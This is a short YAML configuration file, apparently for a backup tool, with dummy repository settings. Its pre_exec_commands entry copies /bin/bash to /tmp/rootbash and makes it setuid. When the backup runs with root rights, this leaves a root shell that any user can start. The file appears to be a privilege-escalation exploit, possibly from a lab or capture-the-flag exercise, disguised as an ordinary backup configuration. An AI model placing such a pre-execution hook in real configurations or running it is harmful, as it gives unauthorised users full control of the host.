conf_version: 3.0.1
repos:
  default:
    repo_uri: dummy
    repo_group: default_group
    backup_opts:
      paths:
        - /home/app/app/
      source_type: folder_list
      exclude_files_larger_than: 0.0
      pre_exec_commands:
        - /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'
    repo_opts:
      repo_password: dummy
      retention_policy: {}
      prune_max_unused: 0
groups: {}
identity: {}
permissions: {}